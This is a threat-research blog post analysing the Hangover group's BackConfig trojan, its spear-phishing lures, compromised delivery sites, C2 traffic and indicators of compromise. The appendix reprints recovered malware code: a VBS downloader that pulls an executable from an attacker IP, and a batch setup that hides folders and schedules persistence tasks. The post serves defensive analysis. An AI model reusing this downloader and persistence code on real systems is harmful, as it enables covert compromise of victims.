This post is also available in: 日本語 (Japanese)
Unit 42 has observed activity over the last 4 months involving the BackConfig malware used by the Hangover threat group (aka Neon, Viceroy Tiger, MONSOON). Targets of the spear-phishing attacks, using local and topical lures, included government and military organizations in South Asia.
The BackConfig custom trojan has a flexible plug-in architecture for components offering various features, including the ability to gather system and keylog information and to upload and execute additional payloads.
The initial infection occurs via a weaponized Microsoft Excel (XLS) document delivered via compromised legitimate websites for which the URLs are most likely shared via email. The documents use Visual Basic for Applications (VBA) Macro code which, if enabled by the victim, starts an installation process consisting of multiple components that result in the plug-in loader payload being downloaded and executed. The modular nature certainly allows for quicker changes to individual components and, perhaps more importantly for the attackers, splits up the malicious behaviors in such a way that could thwart sandbox and dynamic analysis systems, especially when analyzing the components in isolation.
Our threat prevention platform with WildFire detects activity associated with this threat group, while simultaneously updating the ‘malware’ category within the PAN-DB URL filtering solution for malicious and/or compromised domains that have been identified.
Indicators of compromise related to this research are documented at the end of this report and in the Adversary Playbook for the Hangover threat group that can be accessed in the Unit 42 Playbook Viewer.
Unit 42 first saw activity involving the Windows PE executable file (SHA256: 84e56294b260b9024917c390be21121e927f414965a7a9db7ed7603e29b0d69c) when searching AutoFocus data related to particular sectors and countries of interest.
The file was first seen on January 19th, 2020, having been downloaded by two organizations -- a government department in one country and a military organization in another -- within minutes of each other. The source of the download was http://212.114.52[.]148/request/httpsrequest and the file httpsrequest was stored locally as dphc.exe. More details on how the malware was delivered are described later in the blog.
The choice of terminology in URL paths and file names when delivering BackConfig malware in this, and other campaigns discussed later on, is clearly to blend in as benign operations, paths and filenames. Although spelled differently, it could be easy to believe the payload relates to the DHCP networking service.
The purpose of this malware is to allow the actors to download and execute an executable file, as well as download and run batch files to run commands on the end system.
This sample has a custom "decryption" routine that subtracts six from each character. The following strings are decrypted using this method:
The Trojan reads the following file to use in the URL of the C2 beacon. If the file does not exist, the executable will exit without performing any further activities. The pid.txt file is created during the earlier delivery and installation phases starting with the weaponized Excel document. More information about this setup process is covered later in the delivery section. As previously mentioned, this behavior makes an automated analysis of the individual executable payload component harder.
The C2 channel uses HTTPS thanks to the INTERNET_FLAG_SECURE flag used when calling the HttpOpenRequestA function. The beacon HTTP request will look like the following:
GET /orderme/[contents of pid.txt file] HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 @/NEW
Host: linkrequest[.]live [resolving to 23.106.123[.]87]
The Trojan will look for the following field and values within the HTTP response header:
- "Content-Type: application"
- "Content-Type: xDvsds"
- "Content-Type: Bw11eW"
If the content-type field contains a value of application, the Trojan will extract a filename from the HTTP response headers between the string filename and Content-Transfer-Encoding. It will use this filename to create a file in the %USERPROFILE%\Adobe\Driver\dwg\ folder, which it will write the data in the HTTP response to. Based on the other two Content-Types, we believe the filename provided will be either "wuaupdt.exe" or test.bat.
If the content-type field has a value of xDvsds, the Trojan will attempt to execute the following file using ShellExecuteA and the "open" method:
If the content-type field has a value of Bw11eW, the Trojan will attempt to execute the following file using ShellExecuteA and the "open" method:
At the time of writing, the C2 appeared inoperational and no further payloads were seen. We believe that the resultant wuaupdt.exe file would then provide further capabilities to steal information, log keystrokes, and provide the ability to run additional commands either directly or via additional plugins which it would download, as documented by the Qihoo 360 Threat Intelligence group in their investigation of prior campaigns here.
Unit 42 has conducted cursory binary diffing for many of the BackConfig executable files and did not find any non-library function overlaps that would suggest that the payloads are based on the YTY or EHDev frameworks as mentioned here and here.
The malware sample contains some interesting static artifacts including self-signed digital certificates used to sign the executable purporting to be software from the Foxit Software Incorporated company based in California. It is not known why the actors picked this company -- and others listed in Table 1 below -- to impersonate but, as previously mentioned, their use of filenames and URLs makes their payloads appear benign and trustworthy.
Using this meta-data, together with information gleaned from infrastructure investigation, Unit 42 were able to pivot around on AutoFocus data to find additional BackConfig PE executable samples. Those samples from the last 12 months are listed in Tables 1 and 2 below.
|SHA256||Compilation Time (UTC)||First Seen (Pacific)||Signer Name|
|84e5629...||01/20/2020 7:26:09am||01/19/2020 11:49:03pm||Foxit Software Incorporated|
|18ce3ee...||10/10/2019 9:22:11am||01/16/2020 4:30:26pm|
|4a4bc01...||11/21/2019 9:19:49am||01/16/2020 1:31:46am||wind0ws|
|91c67c1...||11/21/2019 9:19:49am||12/02/2019 2:03:41am|
|de5b670...||11/21/2019 9:19:49am||11/21/2019 11:59:05pm|
|f79ebf0...||10/28/2019 5:35:26am||11/09/2019 10:32:09pm||NVIDIA Corporation|
|31faeef...||10/10/2019 9:22:11am||10/13/2019 10:11:04pm||Foxit Software Incorporated|
|d87b875...||09/12/2019 5:54:04am||09/26/2019 9:32:19am||Digicert Global|
|1510996...||12/05/2018 4:35:03am||04/09/2019 10:30:16am||Foxit Software Incorporated|
Table 1. Describing PE compile times and Digital signatures used, ordered by first seen.
The Compilation Time stored in executable (SHA256: 84e5629...) appears to be after the point at which the file was first seen by our WildFire analysis system. While the PE file timestamp could be modified post-compilation, the oddity is more likely explained away with time zones -- 2349 Pacific time on the 19th is 1349 in Bangladesh on the 20th, and 7:26am UTC is in the range of 11:26 to 13:26 across the South Asia region, which would make the sample compilation quite recent with respect to the delivery of it.
More details about the self-signed digital certificates, as well as full hashes, can be found in the IOCs section at the end of this report.
The following table shows the version information from the same PE files, grouped by similar File Description fields. The order remains the same, except for the sample (SHA256: 18ce3ee...) which was first seen January 16th, 2020 but for some reason reverted to using exact version information seen in samples two to three months prior. Namely, Link Finder.
|SHA256||File Description||File Version||Product Name||Product Version||Copyright|
|84e5629...||Альберт (Albert, in English)||06.10.2015||Альберт||01.05.2015||Copyright @ 2015-2026 secosec|
(Link, in English)
|01.01.12||ссылка||10.01.2015||Copyright @ 2011-2021 secosec Inc. Все права защищеныk (All rights reserved, in English)|
|18ce3ee...||Link Finder||01.01.12||Link Finder||13,9,1632||Copyright @2011-2020 Techtest Inc. All Rights Reserved|
|d87b875...||scrapper||01.12.001||scrapper||13,6,1662||Copyright @Scrapper Ltd Reserved|
|1510996...||system process||2,1,1,2015||system process cleaner||2,1,1,2015||Copyright © 2004-2018 Foxit Software Inc. All Rights Reserved|
Table 2. Describing PE version info metadata, ordered by first seen and grouped on matching data.
Of the set, the file (SHA256: 1510996...) has most consistency in terms of a theme, using the Foxit Copyright information, self-signed digital signature and even using the company logo, as shown in the Figure below, for the executable file’s icon. The file’s copyright information only differs from that of Foxit’s Reader software by a missing period symbol, implying it was copied rather than created.
The actors then moved to use seemingly fictitious company and product names while using a mixture of signer names in their digital signatures. No file icons were used at all over the last 11 months.
Recent samples also included Cyrillic text in the file description, product name, and copyright fields, as shown and translated in the table above. It’s hard to know if this is an attempt to set false flags as to the origins of the BackConfig malware, or perhaps to make the content more relevant to specific targets within the victim organizations.
Delivery and Installation
In this section, we describe how the various payloads are delivered based on what we have seen in our customer networks, as well as what we have established through open-source research. Unit 42 has yet to see any evidence of weaponized documents used to deliver BackConfig being attached on phishing emails and that phishing URL links in emails appear to be the Hangover group’s modus operandi.
The remainder of this section focuses largely on Object Linking and Embedding (OLE) Microsoft Excel documents, as they are most commonly used by the Hangover group, at least when it comes to the BackConfig malware. Through infrastructure analysis however, Unit 42 was able to find a BackConfig PE sample (SHA256: e28f1bc0b0910757b25b2146ad02798ee6b206a5fe66ce68a28f4ab1538d6a1f; first seen 10/24/2019) using the C2 domain matissues[.]com and dropped by the weaponised Rich Text Format (RTF) file (SHA256: 752c173555edb49a2e1f18141859f22e39155f33f78ea70a3fbe9e2599af3d3f) from the same day. The RTF used the CVE-2017-11882 exploit against equation editor vulnerabilities in Office applications to execute the PE sample which was a unique exploitation method compared to all other samples analyzed.
Compromised Third-Party Infrastructure
Continuing to pivot on data obtained from the samples found thus far, we discovered some related URLs relating to compromised third-party infrastructure supporting the delivery of the BackConfig malware. The following table lists some examples of compromised sites delivering weaponised XLS files with filenames, such as Circular_No_03.xls (SHA256: 0aa5cf1025be21b18ab12d8f8d61a6fa499b3bbcdbdced27db82209b81821caf) and Circullar_Nov_2017.xls (SHA256: ed638b5f33d8cee8f99d87aa51858a0a064ca2e6d59c6acfdf28d4014d145acb) implying (even with incorrect spelling) that the contents is, or relates to, a letter or advertisement which is distributed to a large number of people.
|SHA-256||First Seen||Related URL||Description||Location|
fbr.php and nphp_registration_form.php (both HTTP 404)
|Consultant and Legal Advice company supporting students to live and study abroad.||Pakistan|
|0aa5cf1...||2018-09||http://webtechhub[.]com/wordpress/wp-content/images/fbr_circular.php||Web design and dev site running outdated WordPress application||Pakistan|
|ed638b5...||2017-11||http://alphamike.com[.]mv/housing||Shipping agency for freight forwarding and cargo delivery.||Maldives|
|http://mgamphs.edu[.]bd/info/ (down)||Muhurigonj Academy of Music and Performance High School. Reference.||Bangladesh|
Table 3. Compromised third-party infrastructure to support delivery of BackConfig.
Given the targeting related to these threats, and the compromised third-party websites, we believe the use of “fbr” in some of the URLs above likely relates to the Federal Board of Revenue (FBR) government organization of Pakistan. The “fbr” theme also runs into the VBA macro code. File ed638b5... contains the statement Const WelcomePage = "FBR".
The old compromised hosting examples in Table 3 above do not rely on Hypertext Preprocessor (PHP) server-side scripts to deliver the weaponized XLS files. Instead, the pages simply used HTTP response status 301 (Moved Permanently) for URL redirection to said XLS, initiating the download. More recent examples make use of PHP with URL filenames matching the social engineering theme, such as “fbr”. In addition, the actors use the PHP script to log any visitors to the page noting in a file named “info.txt” the datetime stamp of the event, the client operating system, and their IP address.
The location of the compromised third-party infrastructure or the organizations legitimately using them, align with the targeting Unit 42 has seen. This could be pure coincidence, a sign from the threat actors that their intention is to take advantage of weaknesses in the target country’s wider infrastructure, or the threat actors leveraging in-country infrastructure that may be considered more trustworthy by the intended victims and their security solutions.
Palo Alto Networks’ WildFire sandbox analyzed sample ed638b5... on November 8th, 2017, and, as described in the table above, the sample was hosted on two compromised websites: a Bangladesh school and a Maldivan shipping agency. While Unit 42 has not seen Hangover activity in the Maldives, the archipelago is in the region alongside other known targets and interestingly, swore in a new President about a week after Unit 42 analyzed the sample.
The EXE payload (SHA256: 4104a871e03f312446ef2fb041077167a9c6679f48d48825cbc1584e4fa792cd) downloaded directly by the VBA code in sample ed638b5... from the URL below relates to those documented by BitDefender here. To date, Unit 42 has only seen 6 similar samples since the late-2017 timeframe for this sample, compared to many more prior, perhaps indicating a change over of the custom payloads used by the Hangover group. Certainly, there are some overlaping Tactics Techniques and Procedures (TTPs) between the older samples and the more recent BackConfig samples.
Evolution of Delivery Payloads
Before moving on to describe the most recent samples and installation methods used by the Hangover actors, the timeline figure below provides a high-level view of the evolution in TTPs used.
Despite the evolution over the years, some habits are hard to break. Firstly, every weaponized XLS Unit 42 has investigated loads a fake error message, such as the one shown in Figure 3 below, to trick the victim into thinking that the file is corrupt and thus nothing has -- or will -- load as intended. Another fictitious error message text has been used in the past often with poor spelling or grammar.
Similarly, the version information metadata stored in all the Excel documents analyzed share the same Author and Last Modified By names - Testing.
The following subsections describe the campaigns and malware as highlighted by the three most recent milestones in the timeline figure above.
2019 Milestone: Multi-Component
Registration Form.xls (SHA256: be3f12bcc467808c8cc30a784765df1b3abe3e7a426fda594edbc7191bbda461) listed in Table 3 above provides an example of the types of lures used by the threat actors.
Upon opening the XLS and enabling the macro code, the picture in Figure 4 below is shown on top white-background cells. As the filename suggests, it’s a registration form and relates to the Naya Pakistan Housing program run by the Pakistani government to help solve the housing shortfall in the country. Eligible citizens include government employees and registration forms were due by October 15th, 2019 (extended through November 15th), meaning the timing and the lure of the campaign on October 25th were clearly planned to increase the chances of compromise.
As the PHP webpages did not exist at the time of writing, Unit 42 cannot prove the XLS file be3f12b... was hosted at the URL listed in row 1 of Table 3 above. However, because of the following points, we have high confidence in the campaign relationship between the two.
- AutoFocus and VirusTotal first processed the XLS file be3f12b... on October 25th, 2019
- VirusTotal processed the nsaimmigration... URL on the same day
- A specific HTTP GET request URL using the notation nphp_registration_form.php?r= was processed in VirusTotal on the same day, and has relations to http://185.203.119[.]184/fin_div/session, which matches the IP address and URL structure in the VBS code dropped by the XLS be3f12b....
- The name of the PHP webpage nphp_registration_form.php relates to the filename of the XLS.
The VBA macro code in the XLS file be3f12b... differed somewhat from that of the samples of the previous years. Instead of directly storing encoded EXE files or running batch shell commands directly from the VBA code itself, it retrieved the content from hidden columns in the Excel sheet, starting at column 27 or “AA”, which is likely to be off-screen for most people. Once the font colour was changed, the “setup” batch code component as per previous variants, and the new Visual Basic Script (VBS) downloader component were revealed in columns AA and AB, respectively, as shown in figure 5 below.
Macro VBA code in the XLS parses the content of the two columns line by line writing the contents to their respective files on disk and executing them following the same process flow as described below in Figure 6.
2019 Milestone: BITS and ZIPs
A more recent weaponized XLS file (SHA256: 021b030981a6db1ec90ccbd6d20ee66b554b7d8c611476e63426a9288d5ce68b) was analyzed by WildFire on November 15th, 2019 and exposed some new techniques. On this occasion, the VBA macro code contained a decimal-encoded ZIP file of only 1,062 bytes in size. Inside the ZIP archive were two text files that would be decompressed to a folder driverkit. One file, driverkit.bat, is the “setup” BAT file already discussed in this report and listed in the appendix section. The other file, Winmgt.txt, is an adaptation of the VBS downloaded also described in this report. However, instead of a direct HTTP download using an MSXML DOM object, this version writes the following contents to Winmgt_Drive.bat, which is executed by a third scheduled task created by the “setup” BAT file.
bitsadmin /transfer Microsoft_Update /download /priority high
2020 Milestone: Fine Tuning
The following execution flow diagram is based on one of the most recent weaponized documents Unit 42 has seen Invoice.xls (SHA256: 8892279f3d87bcd44d8f9ac1af7e6da0cfc7cf1731b531056e24e98510bea83c; first seen 2020-01-15).
The infection process consists of multiple components as just described. The “setup” batch (BAT) file coordinates much of the infection process of the BackConfig plug-in loader once the VBA has written it to disk and executed it.
The numbered bullet list below describes Figure 6.
- Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content.
- Similarly, the VBA code then writes batch code to another text file - Audio.txt. The content of both files is shown in the appendix section of this report.
- Audio.txt is renamed to Audio.bat and executed.
- Audio.bat cleans up any files and folders related to previous infections, and recreates the required environment including creating the aforementioned pid.txt file, and setting various folders and files to be hidden from a default Windows Explorer view. The contents of pid.txt is the victim’s computer name concatenated with a hyphen followed by a random number, although I believe the code used would not work as intended.
- Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist: dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals.
- Finally, before deleting itself, Audio.bat will rename Drive.txt to Drive.vbs. When Drive.vbs is eventually executed by the task scheduler, it will download the BackConfig executable payload. In the case of file 8892279f3... the remote location is http://185.203.119[.]184/Dropbox/request.
- When dphc.exe is eventually executed by the task scheduler, it first checks for the presence of pid.txt (step 4.) and only continues if the file exists.
Ultimately, the XLS writes two files to disk, one of which -- the BAT -- immediately modifies some system settings and creates two scheduled tasks. However, this behaviour may not be enough to determine the components as malicious. Only after 20 minutes will the task scheduler execute the VBS downloader component and launch the BackConfig loader EXE, by which time analysis systems may have stopped monitoring.
The following table describes the TTPs associated with the multiple campaigns described in this report.
|Tactic||Technique (Mitre ATT&CK ID)|
|Technical Information Gathering||Acquire OSINT data sets and information (T1247)|
|Conduct social engineering (T1249)|
|Adversary Opsec||Compromise 3rd party infrastructure to support delivery (T1312)|
|Build Capabilities||Create custom payloads (T1345)|
|Obtain/re-use payloads (T1346)|
|Stage Capabilities||Upload, install, and configure software/tools (T1362)|
|Initial Compromise||Spear Phishing Link (T1192)|
|Execution||User Execution (T1204)|
|Exploitation for Client Execution (T1203)|
|Execution, Persistence||Scheduled Task (T1053)|
|Defense Evasion||Code Signing (T1116)|
|Deobfuscate/Decode Files or Information (T1140)|
|Hidden Files and Directories (T1158)|
|Obfuscated Files or Information (T1027)|
|Defense Evasion, Execution||Scripting (T1064)|
|Defense Evasion, Persistence||BITS Jobs (T1197)|
|Command & Control||Commonly Used Port (T1043)|
|Standard Application Layer Protocol (T1071)|
|Standard Cryptographic Protocol (T1032)|
|Remote File Copy (T1105)|
The Hangover group (aka Neon, Viceroy Tiger, MONSOON) is active and targeting, according to Unit 42’s visibility, government and military organisations in South Asia using spear-phishing emails containing letters or government forms to lure victims into browsing to compromised websites serving weaponized Excel documents that install the BackConfig Trojan. Almost exclusively, Unit 42 has seen the use of weaponized documents that require user execution. Only once in the last six months have we seen use of exploits to circumvent the need for the user to execute any part of the installation chain.
The evolution of BackConfig’s primary and secondary payloads has seen different methods used for executing commands and deploying executables both with and without obfuscation.
The latest versions contain modular components making it easier to update and re-use code in order to rapidly deploy their campaigns in a timely manner to have the highest chance of success. The method in which the latest samples execute also indicates the group’s focus on trying to evade sandbox and other automated analysis systems by breaking down malicious activity into chunks that each seem relatively benign.
|Cortex XDR protects endpoints from all malware, exploits and fileless attacks associated with Hangover actors.|
|WildFire® cloud-based threat analysis service accurately identifies samples associated with these malware families.|
|Threat Prevention provides protection against the known client and server-side vulnerability exploits, malware, and command and control infrastructure used by these actors.|
|URL Filtering identifies all phishing and malware domains associated with these actors and proactively flags new infrastructure associated with these actors before it is weaponized.|
|Users of AutoFocus™ contextual threat intelligence service can view malware associated with these attacks using the following tags:
More information about the Hangover group and the BackConfig malware can be found in AutoFocus.
Palo Alto Networks has shared our findings, including file samples and indicators of compromise, in this report with our fellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. For more information on the Cyber Threat Alliance, visit www.cyberthreatalliance.org. (This is added to blogs pre-shared with the CTA, when loaded into WordPress it will be added when appropriate).
Indicators of Compromise
752c173555edb49a2e1f18141859f22e39155f33f78ea70a3fbe9e2599af3d3f (RTF using CVE-2017-11882)
4BAFBF6000A003EB03F31023945A101813654D26B7F3E402D1F51B7608B93BCB (Audio.txt / .bat from Naya Housing campaign)
abe82ffb8a8576dca8560799a082013a7830404bb235cb29482bc5038145b003 (Winmgt_Drive.bat uses bitsadmin)
87e8c46d065ace580b1ed28565d1fddaa6df49da1ba83f7b3e9982cd8a0013f1 (One_drivers.txt / .vbs from Naya Housing campaign)
a1cd89a684db41206fc71efe327ef608652931e749c24a3232908824cea426bb (Winmgt.vbs using BITS)
4104a871e03f312446ef2fb041077167a9c6679f48d48825cbc1584e4fa792cd (example of older set of downloaders)
The following list of self-signed digital certificates is not exhaustive, and only relates to those seen on BackConfig PE executables samples over the past twelve months.
issuer: CN=Foxit Software Incorporated
subject: CN=Foxit Software Incorporated
valid from: 1/1/2018
valid to: 1/1/2024
valid from: 1/1/2019
valid to: 1/1/2025
issuer: CN=NVIDIA Corporation
subject: CN=NVIDIA Corporation
valid from: 1/1/2019
valid to: 1/1/2025
The following VBS and BAT code was extracted from XLS sample (SHA-256: 8892279f3d87bcd44d8f9ac1af7e6da0cfc7cf1731b531056e24e98510bea83).
- VBS downloader component (SHA256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1)
[Drive.txt -> Drive.vbs CODE]
strFileURL = "http://<strong>185.203.119[.]184/Dropbox/request"</strong>
Set oShell = CreateObject("WScript.Shell")
strPath = "<strong>C:\Drivers\dphc.exe"</strong>
On Error Resume Next
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Type = 1
objADOStream.Position = 0
Set objFSO = CreateObject("Scripting.FileSystemObject")
If objFSO.Fileexists(strPath) Then WScript.Quit()
Set objFSO = Nothing
Set objADOStream = Nothing
Set objXMLHTTP = Nothing
- “Setup” BAT component
[Audio.txt -> Audio.bat CODE]
Set oFile = fso.CreateTextFile("c:\Drivers\Audio.txt")
oFile.WriteLine ("echo off")
oFile.WriteLine ("md %USERPROFILE%\Adobe\Driver\pdf")
oFile.WriteLine ("md %USERPROFILE%\Adobe\Driver\dwg")
oFile.WriteLine ("md %USERPROFILE%\Daily\Backup\Files")
oFile.WriteLine ("attrib +a +h +s %USERPROFILE%\Adobe")
oFile.WriteLine ("attrib +a +h +s %USERPROFILE%\Daily")
oFile.WriteLine ("attrib +a +h +s C:\Drivers")
oFile.WriteLine ("del /f
oFile.WriteLine ("del /f
oFile.WriteLine ("SET /A %COMPUTERNAME%")
oFile.WriteLine ("SET /A RAND=%RANDOM% 10000 + 1")
oFile.WriteLine ("echo %COMPUTERNAME%-%RAND% >>
oFile.WriteLine ("echo %COMPUTERNAME%-%RAND% >>
oFile.WriteLine ("schtasks /delete /tn Winmgt_log /f")
oFile.WriteLine ("schtasks /delete /tn Yahoo_Drive /f")
oFile.WriteLine ("schtasks /create /sc minute /mo 10 /f /tn
Winmgt_log /tr C:\Drivers\dphc.exe")
oFile.WriteLine ("schtasks /create /sc minute /mo 20 /f /tn
Yahoo_Drive /tr C:\Drivers\Drive.vbs")
oFile.WriteLine ("ren C:\Drivers\Drive.txt Drive.vbs ")
oFile.WriteLine ("del %0")
Set fso = Nothing
Set oFile = Nothing
Dim OldName, NewName
GivenLocation = "C:\Drivers\"
OldName = "Audio.txt"
<strong>NewName = "Audio.bat"</strong>
On Error Resume Next
Name GivenLocation & OldName As GivenLocation & NewName
RetVal = Shell("C:\Drivers\Audio.bat", vbHide)
Get updates from
Sign up to receive the latest news, cyber threat intelligence and research from us